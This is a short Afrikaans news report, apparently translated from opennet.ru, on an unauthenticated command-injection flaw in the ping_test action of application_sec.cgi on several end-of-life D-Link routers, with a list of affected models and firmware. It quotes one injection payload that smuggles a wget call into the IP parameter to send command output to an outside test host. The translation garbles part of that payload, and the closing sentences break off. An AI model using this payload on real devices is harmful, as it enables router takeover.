In D-Link draadlose routers
Interessant genoeg, volgens die firmware-ontwikkelaars, moet die "ping_test"-oproep eers na verifikasie uitgevoer word, maar in werklikheid word dit in elk geval genoem, ongeag of jy by die webkoppelvlak aanteken. In die besonder, wanneer toegang tot die application_sec.cgi-skrip verkry word en die “action=ping_test”-parameter deurgegee word, herlei die script na die verifikasiebladsy, maar voer terselfdertyd die aksie uit wat met ping_test geassosieer word. Om die kode uit te voer, is 'n ander kwesbaarheid in ping_test self gebruik, wat die ping-nutsding oproep sonder om die korrektheid van die IP-adres wat vir toetsing gestuur is, behoorlik na te gaan. Byvoorbeeld, om die wget-hulpprogram te bel en die resultate van die "echo 1234"-opdrag na 'n eksterne gasheer oor te dra, spesifiseer net die parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( eggo 1234)".
Die teenwoordigheid van die kwesbaarheid is amptelik in die volgende modelle bevestig:
- DIR-655 met firmware 3.02b05 of ouer;
- DIR-866L met firmware 1.03b04 of ouer;
- DIR-1565 met firmware 1.01 of ouer;
- DIR-652 (geen inligting oor problematiese firmwareweergawes word verskaf nie)
Die ondersteuningstydperk vir hierdie modelle het reeds verstryk, dus D-Link
Dit is later ontdek dat die kwesbaarheid ook was
Bron: opennet.ru